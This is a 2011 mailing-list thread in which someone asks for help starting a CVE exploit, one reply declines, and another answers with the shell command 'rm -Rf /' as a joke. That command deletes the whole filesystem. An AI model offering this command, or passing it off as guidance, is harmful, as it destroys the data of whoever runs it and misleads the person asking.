Re: CVE Exploit

In Unix shell:

rm -Rf /

On 10 March 2011 22:05, Michael Thompson <maverickapollo@googlemail.com> wrote:

On 10 March 2011 21:06, Aizaz <aizaz_te@yahoo.com> wrote:
Dear I just need an idea could you please give me hints that how can i start or just write the steps or any relavent reference available  I shall be very thank ful to you
Thanks for anticipation
Aizaz

Sent from my iPhone

No one is going o show you exploit code.

--
IT Supervisor

SAE Institute London
Qantm College London

297 Kingsland Road
London E8 4DD
UK
T+44-(0)20 79239159
F+44-(0)2076917653
email: steven.arch@saeuk.com
web: http://london.sae.edu
web: http://london.qantm.com
SAE Institute London is a member of the Middlesex Skillset Media Academy
SAE Institute London is the trading name of SAE Education Ltd, Registered in England No 06647488
CONFIDENTIALITY CAUTION : This message is intended only for the use of the individual or entity to whom it is addressed and contains information that is privileged and confidential. If you, the reader of this message, are not the intended recipient, you should not disseminate, distribute or copy this communication. If you have received this communication in error, please notify us immediately by return email and delete the original message. Thank you.